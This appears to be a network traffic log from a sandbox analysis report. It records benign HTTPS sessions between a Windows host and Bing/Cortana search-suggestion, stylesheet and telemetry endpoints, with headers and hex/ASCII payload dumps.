2024-09-26 15:55:37 UTC	880	IN	Data Raw: 7b 22 52 65 73 6f 75 72 63 65 73 22 3a 7b 22 53 74 79 6c 65 73 22 3a 7b 22 43 73 73 48 65 61 64 4e 6f 72 6d 61 6c 22 3a 7b 7d 2c 22 43 73 73 48 65 61 64 4f 76 65 72 72 69 64 65 22 3a 7b 7d 7d 2c 22 53 63 72 69 70 74 73 22 3a 7b 22 4a 73 48 65 61 64 54 6f 70 6d 6f 73 74 22 3a 7b 7d 2c 22 4a 73 48 65 61 64 4e 6f 72 6d 61 6c 22 3a 7b 7d 2c 22 4a 73 45 6e 64 4f 66 43 68 75 6e 6b 22 3a 7b 7d 2c 22 4a 73 42 65 66 6f 72 65 43 6f 6e 74 65 6e 74 22 3a 7b 7d 2c 22 4a 73 41 66 74 65 72 43 6f 6e 74 65 6e 74 22 3a 7b 7d 2c 22 4a 73 41 66 74 65 72 4f 6e 4c 6f 61 64 22 3a 7b 7d 7d 7d 2c 22 53 75 67 67 65 73 74 69 6f 6e 73 22 3a 5b 7b 22 41 74 74 72 69 62 75 74 65 73 22 3a 7b 22 75 72 6c 22 3a 22 2f 73 65 61 72 63 68 3f 71 3d 63 68 61 74 2b 67 70 74 22 2c 22 71 75 65 72 Data Ascii: {"Resources":{"Styles":{"CssHeadNormal":{},"CssHeadOverride":{}},"Scripts":{"JsHeadTopmost":{},"JsHeadNormal":{},"JsEndOfChunk":{},"JsBeforeContent":{},"JsAfterContent":{},"JsAfterOnLoad":{}}},"Suggestions":[{"Attributes":{"url":"/search?q=chat+gpt","quer
2024-09-26 15:55:37 UTC	2249	IN	Data Raw: 31 61 48 5a 65 4e 58 44 79 30 47 6c 46 50 72 62 68 49 4b 59 58 45 4c 57 73 39 71 48 68 58 75 70 37 70 63 5c 75 30 30 32 36 77 3d 38 30 5c 75 30 30 32 36 68 3d 38 30 5c 75 30 30 32 36 71 6c 74 3d 39 30 5c 75 30 30 32 36 63 3d 36 5c 75 30 30 32 36 72 73 3d 31 5c 75 30 30 32 36 63 64 76 3d 31 5c 75 30 30 32 36 70 69 64 3d 52 53 22 2c 22 73 65 67 6d 65 6e 74 73 22 3a 22 4f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 7d 2c 22 54 65 78 74 22 3a 22 43 61 6e 76 61 22 2c 22 48 69 67 68 43 6f 6e 66 69 64 65 6e 63 65 4d 65 74 61 53 75 67 67 65 73 74 69 6f 6e 53 63 6f 72 65 22 3a 30 2c 22 50 72 65 66 65 74 63 68 43 6f 6e 66 69 64 65 6e 63 65 53 63 6f 72 65 22 3a 30 2c 22 43 68 69 6c 64 53 75 67 67 65 73 74 69 6f 6e 73 22 3a 5b 7b 22 54 65 78 74 22 3a 22 c3 9c 62 65 72 73 69 Data Ascii: 1aHZeNXDy0GlFPrbhIKYXELWs9qHhXup7pc\u0026w=80\u0026h=80\u0026qlt=90\u0026c=6\u0026rs=1\u0026cdv=1\u0026pid=RS","segments":"Organization"},"Text":"Canva","HighConfidenceMetaSuggestionScore":0,"PrefetchConfidenceScore":0,"ChildSuggestions":[{"Text":"bersi
2024-09-26 15:55:37 UTC	2691	IN	Data Raw: 63 68 43 6f 6e 66 69 64 65 6e 63 65 53 63 6f 72 65 22 3a 30 7d 2c 7b 22 41 74 74 72 69 62 75 74 65 73 22 3a 7b 22 75 72 6c 22 3a 22 2f 73 65 61 72 63 68 3f 71 3d 63 6f 6d 70 65 6e 64 69 75 6d 22 2c 22 71 75 65 72 79 22 3a 22 63 6f 6d 70 65 6e 64 69 75 6d 22 2c 22 73 74 79 70 65 22 3a 22 41 53 22 2c 22 6c 6d 22 3a 22 31 30 30 30 3a 5c 22 30 5c 22 3b 32 32 30 30 3a 5c 22 31 33 5c 22 3b 33 30 30 30 31 3a 5c 22 31 30 32 32 36 5c 22 3b 32 31 35 32 3a 5c 22 31 30 38 30 30 5c 22 3b 32 30 30 30 3a 5c 22 31 33 34 35 33 32 33 38 5c 22 3b 32 30 31 31 3a 5c 22 37 5c 22 3b 31 31 30 33 34 3a 5c 22 35 35 37 38 39 38 39 30 36 5c 22 3b 22 2c 22 68 63 73 22 3a 22 30 22 7d 2c 22 54 65 78 74 22 3a 22 ee 80 80 63 ee 80 81 6f 6d 70 65 6e 64 69 75 6d 22 2c 22 48 69 67 68 43 6f Data Ascii: chConfidenceScore":0},{"Attributes":{"url":"/search?q=compendium","query":"compendium","stype":"AS","lm":"1000:\"0\";2200:\"13\";30001:\"10226\";2152:\"10800\";2000:\"13453238\";2011:\"7\";11034:\"557898906\";","hcs":"0"},"Text":"compendium","HighCo

Session ID	Source IP	Source Port	Destination IP	Destination Port
67	192.168.2.16	49811	204.79.197.200	443

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:37 UTC	2344	OUT	GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=cm&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=2&cvid=2f3ed6de36a14f3ebfed8e293d185e72&ig=6640447e40b340b6b06581e0487d07db HTTP/1.1 Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept: / Accept-Language: en-CH X-Agent-DeviceId: 01000A4109009A83 X-BM-CBT: 1727366134 X-BM-ClientFeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStore X-BM-DateFormat: dd/MM/yyyy X-BM-DeviceDimensions: 784x640 X-BM-DeviceDimensionsLogical: 784x640 X-BM-DeviceScale: 100 X-BM-DTZ: -240 X-BM-Market: CH X-BM-Theme: 000000;0078d7 X-BM-WindowsFlights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75 X-Device-ClientSession: 64942352AA494B6483DE4D15F1BB38FC X-Device-isOptin: false X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A} X-Device-OSSKU: 48 X-Device-Touch: false X-DeviceID: 01000A4109009A83 X-MSEdge-ExternalExp: d-thshld42,dsbdailyset_c,expmegaclick_cf,hashexpt3,iffsqloptwin10c,msbdsbedu9cf,wsbqfnewsynonym,wsbref-t,wsbswgc-t2 X-MSEdge-ExternalExpType: JointCoord X-PositionerType: Desktop X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI X-Search-CortanaAvailableCapabilities: None X-Search-SafeSearch: Moderate X-Search-TimeZone: Bias=300; DaylightBias=-60; TimeZoneKeyName=Eastern Standard Time X-UserAgeClass: Unknown Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: www.bing.com Connection: Keep-Alive Cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=648e6236&IPMID=1707317782133; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
2024-09-26 15:55:37 UTC	1188	IN	HTTP/1.1 200 OK Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Content-Length: 4402 Content-Type: application/json; charset=utf-8 Expires: -1 P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND" Set-Cookie: _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; domain=.bing.com; path=/; HttpOnly Set-Cookie: MUIDB=5047E5942BB2460EA35B53CCF78DDB3D; expires=Tue, 21-Oct-2025 15:55:37 GMT; path=/; HttpOnly X-EventID: 66f583f9b0c24b8b970bc8c842caaa69 UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0= X-XSS-Protection: 0 X-Cache: CONFIG_NOCACHE Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 94B7DC307B7E4F1FA4653CCDE8C59247 Ref B: EWR30EDGE0307 Ref C: 2024-09-26T15:55:37Z Date: Thu, 26 Sep 2024 15:55:37 GMT Connection: close
2024-09-26 15:55:37 UTC	173	IN	Data Raw: 7b 22 52 65 73 6f 75 72 63 65 73 22 3a 7b 22 53 74 79 6c 65 73 22 3a 7b 22 43 73 73 48 65 61 64 4e 6f 72 6d 61 6c 22 3a 7b 7d 2c 22 43 73 73 48 65 61 64 4f 76 65 72 72 69 64 65 22 3a 7b 7d 7d 2c 22 53 63 72 69 70 74 73 22 3a 7b 22 4a 73 48 65 61 64 54 6f 70 6d 6f 73 74 22 3a 7b 7d 2c 22 4a 73 48 65 61 64 4e 6f 72 6d 61 6c 22 3a 7b 7d 2c 22 4a 73 45 6e 64 4f 66 43 68 75 6e 6b 22 3a 7b 7d 2c 22 4a 73 42 65 66 6f 72 65 43 6f 6e 74 65 6e 74 22 3a 7b 7d 2c 22 4a 73 41 66 74 65 72 43 6f 6e 74 65 6e 74 22 3a 7b 7d 2c 22 Data Ascii: {"Resources":{"Styles":{"CssHeadNormal":{},"CssHeadOverride":{}},"Scripts":{"JsHeadTopmost":{},"JsHeadNormal":{},"JsEndOfChunk":{},"JsBeforeContent":{},"JsAfterContent":{},"
2024-09-26 15:55:37 UTC	2956	IN	Data Raw: 4a 73 41 66 74 65 72 4f 6e 4c 6f 61 64 22 3a 7b 7d 7d 7d 2c 22 53 75 67 67 65 73 74 69 6f 6e 73 22 3a 5b 7b 22 41 74 74 72 69 62 75 74 65 73 22 3a 7b 22 75 72 6c 22 3a 22 2f 73 65 61 72 63 68 3f 71 3d 63 6d 64 22 2c 22 71 75 65 72 79 22 3a 22 63 6d 64 22 2c 22 73 74 79 70 65 22 3a 22 41 53 22 2c 22 6c 6d 22 3a 22 31 30 30 30 3a 5c 22 30 5c 22 3b 32 32 30 30 3a 5c 22 31 33 5c 22 3b 33 30 30 30 31 3a 5c 22 31 31 38 38 34 5c 22 3b 32 31 35 32 3a 5c 22 31 31 39 37 36 5c 22 3b 32 30 30 30 3a 5c 22 32 37 35 39 39 37 30 5c 22 3b 32 30 31 31 3a 5c 22 31 5c 22 3b 31 31 30 33 34 3a 5c 22 35 35 37 38 39 38 39 30 36 5c 22 3b 31 30 30 31 35 3a 5c 22 33 36 31 32 33 33 30 5c 22 3b 31 30 30 31 38 3a 5c 22 32 37 35 39 39 37 30 5c 22 3b 22 2c 22 68 63 73 22 3a 22 30 2e 38 Data Ascii: JsAfterOnLoad":{}}},"Suggestions":[{"Attributes":{"url":"/search?q=cmd","query":"cmd","stype":"AS","lm":"1000:\"0\";2200:\"13\";30001:\"11884\";2152:\"11976\";2000:\"2759970\";2011:\"1\";11034:\"557898906\";10015:\"3612330\";10018:\"2759970\";","hcs":"0.8
2024-09-26 15:55:37 UTC	1273	IN	Data Raw: 81 69 20 6c 6f 67 69 6e 22 2c 22 48 69 67 68 43 6f 6e 66 69 64 65 6e 63 65 4d 65 74 61 53 75 67 67 65 73 74 69 6f 6e 53 63 6f 72 65 22 3a 30 2c 22 50 72 65 66 65 74 63 68 43 6f 6e 66 69 64 65 6e 63 65 53 63 6f 72 65 22 3a 30 7d 2c 7b 22 41 74 74 72 69 62 75 74 65 73 22 3a 7b 22 73 74 79 70 65 22 3a 22 51 50 22 2c 22 68 63 22 3a 22 31 22 2c 22 68 63 73 22 3a 22 31 22 2c 22 61 70 70 49 64 22 3a 22 7b 31 41 43 31 34 45 37 37 2d 30 32 45 37 2d 34 45 35 44 2d 42 37 34 34 2d 32 45 42 31 41 45 35 31 39 38 42 37 7d 5c 5c 63 6d 64 2e 65 78 65 22 7d 2c 22 48 69 67 68 43 6f 6e 66 69 64 65 6e 63 65 4d 65 74 61 53 75 67 67 65 73 74 69 6f 6e 53 63 6f 72 65 22 3a 31 2c 22 50 72 65 66 65 74 63 68 43 6f 6e 66 69 64 65 6e 63 65 53 63 6f 72 65 22 3a 30 7d 2c 7b 22 41 74 74 Data Ascii: i login","HighConfidenceMetaSuggestionScore":0,"PrefetchConfidenceScore":0},{"Attributes":{"stype":"QP","hc":"1","hcs":"1","appId":"{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\cmd.exe"},"HighConfidenceMetaSuggestionScore":1,"PrefetchConfidenceScore":0},{"Att

Session ID	Source IP	Source Port	Destination IP	Destination Port
68	192.168.2.16	49813	23.1.33.206	443

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:37 UTC	801	OUT	GET /rb/1a/cir3,ortl,cc,nc/CYGXBN1kkA_ojDY5vKbCoG4Zy0E.css?bu=C7wJmAO6BJgK_QjnCO0GWlpaWg&or=w HTTP/1.1 Accept: / Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: r.bing.com Connection: Keep-Alive Cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=648e6236&IPMID=1707317782133
2024-09-26 15:55:37 UTC	1210	IN	HTTP/1.1 200 OK Content-Type: text/css; charset=utf-8 Server: Kestrel Access-Control-Allow-Headers: * Access-Control-Allow-Origin: * Last-Modified: Wed, 26 Jun 2024 16:58:47 GMT X-EventID: 66edcc59e91940d998d56872e26c27ae UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0= X-AS-InstrumentationOptions: AppServerLoggingMaster=1 X-AS-MACHINENAME: BNZEEAP00016A5F X-AS-SuppressSetCookie: 1 X-XSS-Protection: 0 cross-origin-resource-policy: cross-origin nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.75} report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]} Cache-Control: public, max-age=314984 Expires: Mon, 30 Sep 2024 07:25:21 GMT Date: Thu, 26 Sep 2024 15:55:37 GMT Content-Length: 20421 Connection: close Alt-Svc: h3=":443"; ma=93600 Akamai-GRN: 0.8e200117.1727366137.479dd69 Timing-Allow-Origin: *
2024-09-26 15:55:37 UTC	15174	IN	Data Raw: 2e 73 77 5f 70 6c 75 73 2c 2e 73 77 5f 75 70 2c 2e 73 77 5f 64 6f 77 6e 2c 2e 73 77 5f 73 74 2c 2e 73 77 5f 73 74 68 2c 2e 73 77 5f 73 74 65 2c 2e 73 77 5f 74 70 63 62 6b 2c 2e 73 77 5f 70 6c 61 79 2c 2e 73 77 5f 70 6c 61 79 64 2c 2e 73 77 5f 70 6c 61 79 61 2c 2e 73 77 5f 70 6c 61 79 70 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 53 65 67 6f 65 20 4d 44 4c 32 20 41 73 73 65 74 73 22 7d 2e 73 77 5f 70 6c 75 73 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 22 ee 9c 90 22 7d 2e 73 77 5f 70 6c 61 79 3a 61 66 74 65 72 2c 2e 73 77 5f 70 6c 61 79 61 3a 61 66 74 65 72 2c 2e 73 77 5f 70 6c 61 79 64 3a 61 66 74 65 72 2c 2e 73 77 5f 70 6c 61 79 70 3a 61 66 74 65 72 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 63 6f Data Ascii: .sw_plus,.sw_up,.sw_down,.sw_st,.sw_sth,.sw_ste,.sw_tpcbk,.sw_play,.sw_playd,.sw_playa,.sw_playp{font-family:"Segoe MDL2 Assets"}.sw_plus:after{content:""}.sw_play:after,.sw_playa:after,.sw_playd:after,.sw_playp:after{font-size:16px;line-height:16px;co
2024-09-26 15:55:37 UTC	5247	IN	Data Raw: 70 74 2b 73 63 72 69 70 74 2b 2e 62 5f 61 6c 67 6f 2c 62 6f 64 79 5b 64 69 72 5d 20 23 62 5f 72 65 73 75 6c 74 73 3e 2e 62 5f 61 6e 73 2b 73 63 72 69 70 74 2b 73 63 72 69 70 74 2b 2e 62 5f 61 6e 73 2c 62 6f 64 79 5b 64 69 72 5d 20 23 62 5f 72 65 73 75 6c 74 73 3e 2e 62 5f 61 6c 67 6f 2b 73 63 72 69 70 74 2b 73 63 72 69 70 74 2b 2e 62 5f 61 6e 73 2c 62 6f 64 79 5b 64 69 72 5d 20 23 62 5f 72 65 73 75 6c 74 73 3e 2e 62 5f 6e 61 76 2b 73 63 72 69 70 74 2b 73 63 72 69 70 74 2b 2e 62 5f 61 6c 67 6f 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 7d 62 6f 64 79 5b 64 69 72 5d 20 23 62 5f 72 65 73 75 6c 74 73 3e 6c 69 3e 2a 3a 6c 61 73 74 2d 63 68 69 6c 64 2c 62 6f 64 79 5b 64 69 72 5d 20 2e 62 5f 63 61 70 74 69 6f 6e 3e 2a 3a 6c 61 73 74 2d 63 68 69 6c 64 2c 62 6f Data Ascii: pt+script+.b_algo,body[dir] #b_results>.b_ans+script+script+.b_ans,body[dir] #b_results>.b_algo+script+script+.b_ans,body[dir] #b_results>.b_nav+script+script+.b_algo{margin-top:4px}body[dir] #b_results>li>:last-child,body[dir] .b_caption>:last-child,bo

Session ID	Source IP	Source Port	Destination IP	Destination Port
69	192.168.2.16	49814	204.79.197.200	443

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:37 UTC	2233	OUT	POST /threshold/xls.aspx HTTP/1.1 Origin: https://www.bing.com Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept: / Accept-Language: en-CH Content-type: text/xml X-Agent-DeviceId: 01000A4109009A83 X-BM-CBT: 1727366134 X-BM-DateFormat: dd/MM/yyyy X-BM-DeviceDimensions: 784x640 X-BM-DeviceDimensionsLogical: 784x640 X-BM-DeviceScale: 100 X-BM-DTZ: -240 X-BM-Market: CH X-BM-Theme: 000000;0078d7 X-BM-WindowsFlights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75 X-Device-ClientSession: 64942352AA494B6483DE4D15F1BB38FC X-Device-isOptin: false X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A} X-Device-OSSKU: 48 X-Device-Touch: false X-DeviceID: 01000A4109009A83 X-MSEdge-ExternalExp: d-thshld42,dsbdailyset_c,expmegaclick_cf,hashexpt3,iffsqloptwin10c,msbdsbedu9cf,wsbqfnewsynonym,wsbref-t,wsbswgc-t2 X-MSEdge-ExternalExpType: JointCoord X-PositionerType: Desktop X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI X-Search-CortanaAvailableCapabilities: None X-Search-SafeSearch: Moderate X-Search-TimeZone: Bias=300; DaylightBias=-60; TimeZoneKeyName=Eastern Standard Time X-UserAgeClass: Unknown Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: www.bing.com Content-Length: 30503 Connection: Keep-Alive Cache-Control: no-cache Cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=117ACB7E7D246FD81513DF607C366EB7&CPID=1707317782133&AC=1&CPH=c645c844; _EDGE_S=SID=117ACB7E7D246FD81513DF607C366EB7&mkt=de-ch; SRCHUID=V=2&GUID=E0DD87A720F84B6F91D233EB006F66A1&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=de&HV=1707317784&IPMH=648e6236&IPMID=1707317782133; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
2024-09-26 15:55:37 UTC	16355	OUT	Data Raw: 3c 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 35 30 34 37 45 35 39 34 32 42 42 32 34 36 30 45 41 33 35 42 35 33 43 43 46 37 38 44 44 42 33 44 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 61 34 38 61 61 64 36 35 37 63 63 39 34 30 30 36 62 63 36 30 64 36 30 33 37 64 33 37 61 61 66 62 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 74 6f 74 61 6c 6e 75 6d 62 65 72 4f 66 45 6e 74 72 69 65 73 22 3a 22 30 22 Data Ascii: <ClientInstRequest><CID>5047E5942BB2460EA35B53CCF78DDB3D</CID><Events><E><T>Event.ClientInst</T><IG>a48aad657cc94006bc60d6037d37aafb</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","totalnumberOfEntries":"0"
2024-09-26 15:55:37 UTC	14148	OUT	Data Raw: 75 67 67 65 73 74 22 2c 22 53 63 65 6e 61 72 69 6f 22 3a 22 53 54 22 2c 22 53 43 22 3a 34 2c 22 44 53 22 3a 5b 7b 22 54 22 3a 22 44 2e 55 72 6c 22 2c 22 4b 22 3a 31 30 30 31 2c 22 51 22 3a 22 43 68 65 63 6b 20 66 6f 72 20 75 70 64 61 74 65 73 22 2c 22 56 61 6c 22 3a 22 53 54 22 2c 22 48 6f 22 3a 32 2c 22 47 72 22 3a 31 2c 22 44 65 76 69 63 65 53 69 67 6e 61 6c 73 22 3a 7b 22 52 61 6e 6b 22 3a 32 34 33 32 2c 22 50 48 69 74 73 22 3a 22 53 79 73 74 65 6d 2e 50 61 72 73 69 6e 67 4e 61 6d 65 22 2c 22 49 64 22 3a 22 41 41 41 5f 53 79 73 74 65 6d 53 65 74 74 69 6e 67 73 5f 4d 75 73 55 70 64 61 74 65 5f 55 70 64 61 74 65 41 63 74 69 6f 6e 42 75 74 74 6f 6e 22 2c 22 44 4e 61 6d 65 22 3a 22 43 68 65 63 6b 20 66 6f 72 20 75 70 64 61 74 65 73 22 2c 22 4d 44 4e 22 3a Data Ascii: uggest","Scenario":"ST","SC":4,"DS":[{"T":"D.Url","K":1001,"Q":"Check for updates","Val":"ST","Ho":2,"Gr":1,"DeviceSignals":{"Rank":2432,"PHits":"System.ParsingName","Id":"AAA_SystemSettings_MusUpdate_UpdateActionButton","DName":"Check for updates","MDN":
2024-09-26 15:55:37 UTC	426	IN	HTTP/1.1 204 No Content Access-Control-Allow-Origin: * X-Cache: CONFIG_NOCACHE Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 9C8ED34773F5465B80962B23B732E02D Ref B: EWR30EDGE1618 Ref C: 2024-09-26T15:55:37Z Date: Thu, 26 Sep 2024 15:55:37 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
70	192.168.2.16	49815	204.79.197.222	443

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:37 UTC	462	OUT	GET /conf/v2/asgw/fpconfig.min.json?monitorId=asgw HTTP/1.1 Origin: https://www.bing.com Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept: / Accept-Language: en-CH Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: fp.msedge.net Connection: Keep-Alive
2024-09-26 15:55:37 UTC	429	IN	HTTP/1.1 200 OK Cache-Control: public,max-age=900 Content-Length: 20022 Content-Type: application/json; charset=utf-8 ETag: "1517689130" Access-Control-Allow-Origin: * Request-Context: appId=cid-v1:b183296d-485b-49fc-81c7-a511e61d1309 X-Cache: CONFIG_NOCACHE X-MSEdge-Ref: Ref A: 8E59FD04C3DA49FAA7E30F639B250627 Ref B: EWR30EDGE1121 Ref C: 2024-09-26T15:55:37Z Date: Thu, 26 Sep 2024 15:55:37 GMT Connection: close
2024-09-26 15:55:37 UTC	3798	IN	Data Raw: 7b 22 73 22 3a 35 30 30 30 2c 22 6e 22 3a 33 2c 22 65 22 3a 5b 7b 22 65 22 3a 22 2a 2e 61 7a 72 2e 66 6f 6f 74 70 72 69 6e 74 64 6e 73 2e 63 6f 6d 22 2c 22 77 22 3a 35 30 30 30 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 2a 2e 63 6c 6f 2e 66 6f 6f 74 70 72 69 6e 74 64 6e 73 2e 63 6f 6d 22 2c 22 77 22 3a 32 30 30 30 2c 22 6d 22 3a 31 7d 2c 7b 22 65 22 3a 22 2a 2e 63 6c 6f 2e 66 6f 6f 74 70 72 69 6e 74 64 6e 73 2e 63 6f 6d 22 2c 22 77 22 3a 31 30 30 2c 22 6d 22 3a 31 32 38 7d 2c 7b 22 65 22 3a 22 2a 2e 6e 72 62 2e 66 6f 6f 74 70 72 69 6e 74 64 6e 73 2e 63 6f 6d 22 2c 22 77 22 3a 34 32 30 2c 22 6d 22 3a 33 7d 2c 7b 22 65 22 3a 22 61 66 64 78 74 65 73 74 2e 7a 30 31 2e 61 7a 75 72 65 66 64 2e 6e 65 74 22 2c 22 77 22 3a 35 30 30 2c 22 6d 22 3a 31 7d 2c 7b Data Ascii: {"s":5000,"n":3,"e":[{"e":".azr.footprintdns.com","w":5000,"m":128},{"e":".clo.footprintdns.com","w":2000,"m":1},{"e":".clo.footprintdns.com","w":100,"m":128},{"e":".nrb.footprintdns.com","w":420,"m":3},{"e":"afdxtest.z01.azurefd.net","w":500,"m":1},{
